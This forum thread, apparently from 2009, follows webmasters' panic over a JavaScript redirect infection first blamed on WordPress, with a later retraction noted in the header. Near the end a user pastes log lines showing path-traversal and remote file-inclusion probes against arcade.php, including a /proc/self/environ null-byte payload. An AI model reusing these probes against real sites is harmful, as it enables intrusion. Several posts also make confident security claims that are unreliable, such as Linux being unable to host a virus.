WARNING - WORDPRESS.COM HAS JS REDIRECT VIRUS...UPDATE...NOT WORDPRESS

[HeySal]

APPARENTLY WORDPRESS IS NOT THE CULPRIT - COINCIDENCE THAT THE SITE WAS HIT WHILE I WAS BROWSING WORD PRESS - MORE INFO ON POST 107 - THIRD PAGE.

I was just in admin on my new blog - was browsing the themes and all of the sudden my avast went nuts. I cut the connection but it was too late - my blog has JS redirect virus now -- new so I'm just going to toss it and hope that it can't spread on that server.

It is on the WP website itself so EVERYONE with WP might be vulnerable now.
Best thing you can do is shut down your php until they fix their virus problem because it will invade your whole site - everything but HTML.

This is NOT a joke.

I have contacted WP in a bug report and reported the virus on twitter hoping their admin will see it quickly - if anyone has an inside track to WP admin - they need to be notified IMMEDIATELY.

[HBZSoftware]

Yeah, because it's really possible to shut down your "php"...

[Michael Silvester]

Wow...

Thanks for the heads-up Sal!

So you were actually inside your wordpress.com admin
when that all happened?

Take Care,

Michael Silvester

[bookmarkr]

Quote:

Originally Posted by HBZSoftware.com

Yeah, because it's really possible to shut down your "php"...

At least you're getting the heads up if you have a blog on wordpress.

[HeySal]

Quote:

Originally Posted by HBZSoftware.com

Yeah, because it's really possible to shut down your "php"...

Look I'm not a tech but I do know that this can wipe out your php because My main site was hit a few months back - and my tech is world class security - ask Kevin Riley and Peter Bestel if I'm kidding. You might not be able to turn off your php, but everything on it can get pretty badly messed up from these things. This isn't a normal virus. It's taking down sites left and right.

[GarrieWilson]

Quote:

Originally Posted by HBZSoftware.com

Yeah, because it's really possible to shut down your "php"...

You can disable PHP or tell it PHP files only use the extention .xxx

[HeySal]

I not only lost everything php, I can't use mysql at all -we are rebuilding everything possible in HTML - it doesn't seem to effect HTML. I hadn't even started working on this one yet - the address my avast brought up with the alarm was the wordrpress install - I hadn't even hit install, page 6 of the themes menu was just loading. As soon as the alarm went off I cut that page and went back to my admin but I already wasn't able to get back on admin - avast blocked it.

On my other site we lost our forum, cube cart, coppermine photo gallery, and blog. There were so many security holes chewed that the virus was coming back in as fast as my tech could plug the holes. Every page in php was effected.
Peter Bestel is having problems not being able to keep it off and Kevin just had someone fix his site, not sure if he was able to totally get rid of it but if it is on the Wordpress site itself, nobody is safe and nobody will be able to keep it off. They are on their way to crashing out php on a lot of servers.

[GarrieWilson]

Sal,

You might want to consider getting a new host that will keep your server secure and a new tech guy because it sounds like he isnt as great as you may think.

[HeySal]

Quote:

Originally Posted by GarrieWilson

Sal,

You might want to consider getting a new host that will keep your server secure and a new tech guy because it sounds like he isnt as great as you may think.

Garrie - my tech is out now (heart surgery and family problems) he disabled everything for us though - and plugged the holes but didn't get everything cleaned - he did security for Government websites.

Anyhow -- this isn't MY site I'm talking about now - - this is on WORPRESS's site. That means every script hooked to it is in danger - and if you want to mess with it, fine, but you might want to talk to Kevin and find out the problems that his tech went through with it if you don't think mine was capable. Or find out if Peter was able to FINALLY get them off or if he is having to rebuild (which won't do much good since it's on worpress itself now).

Like I said - this is not a JOKE - not by a hell of a longshot. No one who is dealt with this one so far is going to take this lightly.

[Adrian Cooper]

Quote:

Originally Posted by HeySal

I was just in admin on my new blog - was browsing the themes and all of the sudden my avast went nuts. I cut the connection but it was too late - my blog has JS redirect virus now -- new so I'm just going to toss it and hope that it can't spread on that server.

It is on the WP website itself so EVERYONE with WP might be vulnerable now.
Best thing you can do is shut down your php until they fix their virus problem because it will invade your whole site - everything but HTML.

This is NOT a joke.

I have contacted WP in a bug report and reported the virus on twitter hoping their admin will see it quickly - if anyone has an inside track to WP admin - they need to be notified IMMEDIATELY.

My servers have world class security as well. On one server I host sites for others, many of which have been hacked.

After much digging I discovered that the sites had actually been hacked over FTP.

Looks to me as if the users have caught a "drive by" trojan which is either a key logger or sends login details to the hacker.

I do not know he origin, but I do know it is spreading fast around the 'net.

I always suggest people run an anti-trojan program every day. The best in my view is:

A-Squared

Not aff link.

[George Wright]

HeySal,

Forgive my ignorance. When you say Wordpress are you talking about the blogs that are actually hosted by WP or the WP blogs we have installed on our own hosts.

Thanks,

George Wright

[warf]

If you downloaded anything from any warez sites a person would be just asking for a hijack. another thing. avoid windows servers. linux can't physically host a virus. it's total impossible. The only thing a iframe virus is such: a iframe that opens a location on another website ( server ) and hosts the virus or maluware etc.etc.etc.
The best way to avoid this:
1.) only go to sites that you are familiar with
2.) use upper n lower case letters with symbols in your passwords to your websites.
3.) if you have to go to a website, go to yahoo google msn and see what is pulled up about the site. even siteadvisor.com/sites/thewebsitename.com/summary/
4.) before installing any program do your homework on it to ensure that your not installing a program that has a known exploit.

Anyhow I hope I was in some assistance

[HeySal]

Quote:

Originally Posted by George Wright

HeySal,

Forgive my ignorance. When you say Wordpress are you talking about the blogs that are actually hosted by WP or the WP blogs we have installed on our own hosts.

Thanks,

George Wright

George - anything php is vunerable. I'm hearing a lot of denial here but this is the worst to hit the net yet. It is of Russian origin.

At the end of last year Government computers were hacked. My techs computer was hacked -- at the bios level! A few months later the JS redirect viruses started cropping up -- a lot of people that have it don't even have a clue. Avast will tell on it, but won't take it off, even though it looks like it is doing or has done so. It has to be removed manually.

On my site and many others WP was hosted on my server - I don't use fly by night servers, but still will be going to servage after this - just dumping everything that worked on php.

We had them get on our site manually - Fin had it hooked up so bots couldn't get on it - it was a live member. Got in and ran something on it manually from what he could tell. Built security holes all over so they could get back in then set a bot in there and loaded fake JS codes on EVERY PAGE that wasn't pure HTML. It was a mess. Enough so that I'm just dumping the whole load of php programs. After 3 years of continual build and a thosand or two pages, it's just easier.

ECS_Dave just set this WP up for a JV we are getting ready to build. So the blog is on his server - not sure which one - doesn't matter, the virus came straight from the wordpress site. I was browsing for a theme and page 6 of the theme menu was loading and that is when my avast went off. I disconnected from the page immediately but it wasn't fast enough because I can't access my admin page now - my Avast won't let me. It was that fast. Avast gave the address of the virus as http://wordpress...../install/ but I had not even tried to install one of the themes yet.

That's all I can tell you. It is on wordpress.

[Peter Bestel]

Can't join in the conversation much as I'm just out the door, but Sal is right, nasty little buggers. I can't confirm that the Wordpress site is infected (don't fancy going there just to check) but if it's on your server then your blogs and websites become unusable, flagged as trojan sites and redirect to numerous 'suspicious' sites.

My sites are looking OK just now but I've had to spend a lot of time on this issue and I've become a tad paranoid because of it.

Peter

[HeySal]

yeah - avast gave a wordpress.com address for it -- but I was in such a damned big hurry disconnecting before it got my admin that I didn't get the whole thing - got my admin anyway. I am scanning my own computer right now just for gp's and will check my log and see if the compete address is listed even though I disconnected like a mad hatter to get away from it. I know it was on page 6 of the theme menu if you search it without perimeters - but all that means is that before the night is over it will probably be on all of the themes and into the widgets as well. It travels damned fast once it gets in. With so few anti-virus programs able to detect it half the web is going to be infested if they don't shut it down right away.

[emigre]

So if your site is infected it looks all scrambled up or how can you tell if it's been infected?

[HeySal]

You won't see it. The only way you will know it is there is if you have Avast - it will alert you that there is a virus. If you are good at Java script codes you will see slight differences from real codes - it loves yahoo counters. If you have one and know the Java script you have almost an automatic signal right there. Not sure how the site will act to others because my avast blocks access to an infected sites. Most anti-virus programs won't detect it. If it's on your computer Avast will make you believe it took it off, but it doesn't - you have to do it manually - if you go to my profile, go all the way back to the beginning of my thanked posts and the discription of the one you get on your computer itself will be described there. There is a similar audio address, too.

On your website, it just creates complete havoc as it sinks in (it's a worm that eventually plants a root kit so nothing is safe if you don't get it off. It will redirect visitors to other sites as well. Not good ones either. Great for your future traffic, eh?

Thanks Russia - I used to be proud of my Cossack roots.

[GrantFreeman]

Thanks Sal. Considering starting a wordpress blog tonight and came across the thread. I see a few mentions of the JS virus at McAfee's site:

JS/Downloader-BNL

Is this the same one you're talking about? If it is,

"This trojan can get installed while browsing Websites where it has been hosted."

Sounds like it might be a good idea to wait on installing any WordPress themes if anyone else is thinking about it.

Grant

[Paul Myers]

Possibly the problem?

PHP Script Injection Exploit in WordPress 2.7.1 | TechJaws: Internet Security and SEO

[Martin Luxton]

I experienced something similar with Kaspersky this week. It flagged ad.doubleclick.net redirects on bbc.co.uk and apple.com as phishing sites.

I phoned doubleclick about it and seems to have cleared up.

Martin

[cima]

Sorry for being such an idiot, but is there any difference if you have a mac ? I mean, can my blog be infected even if have a mac or is it only affecting people using Microsoft Windows ?

Cheers, Samuel.

[zeurois]

Quote:

Originally Posted by Paul Myers

Possibly the problem?

PHP Script Injection Exploit in WordPress 2.7.1 | TechJaws: Internet Security and SEO

It's because they (wp) recently introduced the auto-upgrade feature, which requires writing permissions, and therefore, any code injection can alter your php/theme files and forward the virus/exploit to others. It sucks. I just upgraded to 2.8 without even knowing about this thread but I hope they've fixed it already and I'm not exposed.

[John Henderson]

Quote:

Originally Posted by cima

Sorry for being such an idiot, but is there any difference if you have a mac ? I mean, can my blog be infected even if have a mac or is it only affecting people using Microsoft Windows ?

Samuel, the infection happens on the remote server that hosts your blog -- not on the computer you have at home.

However, the operating system that your server uses (Windows, Linux, MacOS) could be a factor in how susceptible it is to certain attacks.

[GrantFreeman]

It's not a dumb question According to this it's possible:

Are Windows PCs Threatened by Malware Harbored on Mac & Linux OS’s? - Security Corner

The way I understand this, is if I downloaded a wordpress theme on my mac, and:

• uploaded it to my server space- It could effect people with PC's that visit my site
• sent it to a friend with a PC - It could effect my friends computer

Edit: or is this just an attack on web hosting machines only? Trying to understand this.

Grant

Quote:

Originally Posted by cima

Sorry for being such an idiot, but is there any difference if you have a mac ? I mean, can my blog be infected even if have a mac or is it only affecting people using Microsoft Windows ?

Cheers, Samuel.

[Adrian Cooper]

Quote:

Originally Posted by cima

Sorry for being such an idiot, but is there any difference if you have a mac ? I mean, can my blog be infected even if have a mac or is it only affecting people using Microsoft Windows ?

Cheers, Samuel.

Hackers write trojans for PC's.

A Mac is much safer from that perspective.

[Adrian Cooper]

Quote:

Originally Posted by John Henderson

Samuel, the infection happens on the remote server that hosts your blog -- not on the computer you have at home.

However, the operating system that your server uses (Windows, Linux, MacOS) could be a factor in how susceptible it is to certain attacks.

John: While that is generally true, there is a new breed of attack happening now.

Hackers are collecting logins via trojans and hacking sites over FTP - I am sorting out this issue for people hosted on one of my servers.

Trojans are nasty and insidious, which is why everyone should regularly scan for them using A Squared or whatever.

[John Henderson]

Quote:

Originally Posted by apc01

John: While that is generally true, there is a new breed of attack happening now.

Hackers are collecting logins via trojans and hacking sites over FTP - I am sorting out this issue for people hosted on one of my servers.

Trojans are nasty and insidious, which is why everyone should regularly scan for them using A Squared or whatever.

Yes, my mistake... An infection on your desktop machine co-ordinated with an attack on your online accounts and hosted space. Very nasty.

[Tony Dean]

Does this mean we can't visit any WP blogs out there that are specifically hosted at WP?
Or can we visit other blogs that use WP elsewhere?

[zoobie]

Quote:

Originally Posted by cima

Sorry for being such an idiot, but is there any difference if you have a mac ? I mean, can my blog be infected even if have a mac or is it only affecting people using Microsoft Windows ?

Cheers, Samuel.

Well Samuel. it is a php exploit or javacript level. It is nothing to do if you are using windows MAC or Linux.. It accepts the web browsers, Perhaps IE I think...

any issue using Firefox? anyone knows?

[Fernando Veloso]

Thanks for the heads-up Sal.

Damn, Lots of trouble ahead this weekend. Is Hostgator usually secure from this issues?

[John Henderson]

While I was getting something to eat today, I was watching "Working Lunch" on BBC2 (it's a show dedicated to money and business matters, and it's on at lunchtime).

The hosts of the show said "The gremlins have got into our website, so we can't direct you to that at the moment...". I immediately thought of this thread...

http://news.bbc.co.uk/1/programmes/w...ch/default.stm

[HeySal]

Quote:

Originally Posted by Fernando Veloso

Thanks for the heads-up Sal.

Damn, Lots of trouble ahead this weekend. Is Hostgator usually secure from this issues?

Usually secure doesn't seem to matter much with this one. As I said - the one on my site was actually planted by a member - and that means a live person brought it in. Bots could NOT get on my site. We were actually lullled by our level of security. Hadn't had spam on the site of any sort in over a year. It was a Russian - member name "easter" password "bunny". Real sense of humor. The virus seems to build security holes before it drops codes so that when it gets shut out it can get back in, then it starts on Java codes. The codes are very similar to real codes. You have to check every inch of your site when infected.

This virus started around about the time the US Gov computers got hacked. That might be a coincidence, but it also might just be some sort of show of power, too. Both Russian sources. So are they going to cyber war on the world or what?

IF you think that email phishers were sick bastards - this thing makes them look like boy scouts. I'm wondering how long it's going to be before they start stamping this crud with an "over 100 million served" sign.

[cima]

Thanks everybody for having answered... That seems to be such a nasty virus. But why do those jerks need to set up such virus ?!?!! What's the interest ??

[CDarklock]

Why exactly is this story not on Slashdot - or any other news outlet I can find - after nine hours? Is this not really a WP site issue?

[Barbara Eyre]

I'm still confused, as this question hasn't been directly answered - I'm seeing references to both.

Does this affect only blogs hosted at WordPress.com ?

Or - does it also affect blogs that we install on our own websites?

Or - does it only concern WordPress themes (not themes from 3rd parties), which means it doesn't matter if your blog is installed on your own site or is hosted by WordPress.com ?

[MichaelHiles]

Hey HeySal... PHP is teh suxx0r... in fact, any interpreted script is more vulnerable... check out DotNetNuke - The Leading Open Source Web Content Management Framework for ASP.NET

[SusanneUK]

Quote:

Originally Posted by Barbara Eyre

I'm still confused, as this question hasn't been directly answered - I'm seeing references to both.

Does this affect only blogs hosted at WordPress.com ?

Or - does it also affect blogs that we install on our own websites?

Or - does it only concern WordPress themes (not themes from 3rd parties), which means it doesn't matter if your blog is installed on your own site or is hosted by WordPress.com ?

You and me both, I would also like clarification on these points, if anyone can give it that is

Sue

[Peter Bestel]

This is my experience for those that need some clarification.

I've got a number of wordpress blogs hosted on Dreamhost (shared hosting). I use a mix of freebie themes and a few on the paid theme, Thesis. About three weeks ago my PC got a bunch of trojans, viruses etc all at once. At the same time my Dreamhost account was attacked with this Javascript iframe redirect, affecting ALL my wordpress blogs and a few static websites that I've got on that server.

It installs extra code into php files, normally index.php, admin.php, a few theme php files including both the free ones and Thesis and also onto some plugin files.

Installing Wordpress plugin 'Exploit Scanner' identified the baddies and I was able to clean up all the sites, only for it to return a few days later.

I purchased Craig Desorcy's Block Lock Down e-book, followed his instructions and since have been clean. Can't recommend that one highly enough.

Cleaning the PC has taken an eternity but I reckon I'm as clean as I can be for now.

I can't comment on the issue with the actual Wordpress site site being infected as I've not experienced it, but it's not impossible, for sure.

I reckon the initial infection on my PC keylogged my FTP and got to my server that way. I've got Roboform but for some reason wasn't using it for Filezilla (which I've sinced dumped). I now use Secure FTP together with Roboform.

Touch wood, everything appears clean, but I've said that before...

Check out the link that Paul Myers posted earlier in this thread, pretty much explains the minimum that needs to be done.


Peter

PS No doubt better quality hosting may have saved some hassle - hindsight's such a wonderfully accurate science.

[Mark Riddle]

A Short answer to the can the mac be infected.

YES, and thousands are, because so there are so few people even bothering using AV software on macs there are tons of them infected.

Remember, Mac Operating system is isn't really an independent system its an interface written on top of the BSD version of unix.

Sal in the opening post is talking about the Wordpress.COM hosted site. NOT self hosted word press.


Mark Riddle

[ECS Dave]

I'm not certain how this code is getting into the php files...

I looked at a couple and they had some encoded javascript code
at the end of each of them. I didn't (shame on me) note which files,
but as this was a "new" installation, went ahead and uninstalled
using the fantastico utility. I then installed a new instance of the
latest wordpress (2.8), and have not seen any issues, thus far.

Of course, the password was changed...

By no means am I a web-security expert, nor do I portray one
in any shape or fashion, anywhere... However, I have learned
the very first line of defense should be one's own machine.
This includes, but is not limited to a current, updated, and
reputable virus scanner -- A "malware" scanner -- and perhaps
some diligence with regards to the sites you visit.

Be Well!
ECS Dave

[ECS Dave]

Quote:

Originally Posted by Mark Riddle

Sal in the opening post is talking about the Wordpress.COM hosted site. NOT self hosted word press.


Mark Riddle

Actually Mark, Sal's talking about a self-hosted wordpress installation.
She was using the "Add New Themes" interface, built into the WP
dashboard, which links to the wp-themes.com site. Being the brave
soul that I am, I browsed the pages myself, but (thankfully) was unable
to recreate the error/problem/issue.

Be Well!
ECS Dave

[HeySal]

That's right Mark - this time I am talking about the wordpress site itself. I was browsing the themes available when I was hit.

On my other site - the WP was on my site's server - but it was actually the phpbb forum that they came in through.

Once more - if you have php scripts running, you are vulnerable. Anything with 777 permissions is vulnerable. I don't think it matters what system you are on and I think that some hosts are safer than others but not sure that any are completely safe. I'm not sure at this point if anything will ever be completely safe again.

I think I'm seeing that AVG is also able to detect the virus. Still probably have to remove it by hand, it really knows how to protect itself.

Whoever said their static scripts got hit too - that is just too scary to think about.

[Leon McKee]

Mark, can you provide some independent links to verify your statements concerning the Mac OS?

Leon McKee

Quote:

Originally Posted by Mark Riddle

A Short answer to the can the mac be infected.

YES, and thousands are, because so there are so few people even bothering using AV software on macs there are tons of them infected.

Remember, Mac Operating system is isn't really an independent system its an interface written on top of the BSD version of unix.

Sal in the opening post is talking about the Wordpress.COM hosted site. NOT self hosted word press.


Mark Riddle

[Mark Riddle]

Quote:

Originally Posted by Leon McKee

Mark, can you provide some independent links to verify your statements concerning the Mac OS?

Leon McKee

Mac OS X - Wikipedia, the free encyclopedia

FreeBSD - Wikipedia, the free encyclopedia

Apple - Mac OS X Leopard - Technology - UNIX

[HeySal]

Dave - you did recreate it - or just didn't get rid of it. The main domain URL still sets off my avast. I'm not going any further on it as I don't want to have to get this thing off of my own computer, too.

Your FTP is probably compromised. Dump the site - it's not been worked on so not much loss and much easier clean up. Your whole hosting account is probably infested.

[lakeview]

Would anyone be able to advise me about this situation, please? After reading this thread, I went to check some things on a new WP self-hosted blog I just installed a couple of weeks ago. It's using version 2.8 and hosted on Hostgator.

I checked my latest visitors stats and saw something I'm concerned about. It shows:

Host: 83.148.64.25

* /featured/how-t%20.../arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../.
Http Code: 404 Date: Jun 12 09:12:17 Http Version: HTTP/1.1

* /featured/arcade.php?phpbb_root_path=http://forgottentreasures.net/../proc/self/environ%00
Http Code: 403 Date: Jun 12 09:28:16 Http Version: HTTP/1.1

Since this shows 403/404 codes does it mean everything is ok?

I am so new to WP blogs and this really has me worried.

Thanks so much for any help you can offer.

Angela

[Leon McKee]

Mark, what I'm asking for are specific links that show the Mac OS is or has been infected. A lot of marketers do have Macs sitting on their desktops so it's a good idea to stay abreast of these types of issues to say the least.

Leon McKee

Quote:

Originally Posted by Mark Riddle

Mac OS X - Wikipedia, the free encyclopedia

FreeBSD - Wikipedia, the free encyclopedia

Apple - Mac OS X Leopard - Technology - UNIX

[ECS Dave]

I copied the code from one of the pages, and uploaded it to virustotal.com and got this result:

Virustotal. MD5: e47fd7ca9ad1adf9b0f8bba33e19fc5f JS:Bulered JS:Bulered

And google's results for "JS:Bulered" are limited, to say the least..

I tried several online JS decoders, but no go there either...

Hmmm...

Be Well!
ECS Dave

[HeySal]

Quote:

Originally Posted by lakeview

Would anyone be able to advise me about this situation, please? After reading this thread, I went to check some things on a new WP self-hosted blog I just installed a couple of weeks ago. It's using version 2.8 and hosted on Hostgator.
etc

Angela

What is your URL? My avast goes off when I land on an infected site - easiest way to tell.

[lakeview]

Quote:

Originally Posted by HeySal

What is your URL? My avast goes off when I land on an infected site - easiest way to tell.

HeySal,

It's Stress Free Wedding Planning

Thanks so very much!!! I'm in a bit of a panic here.

Angela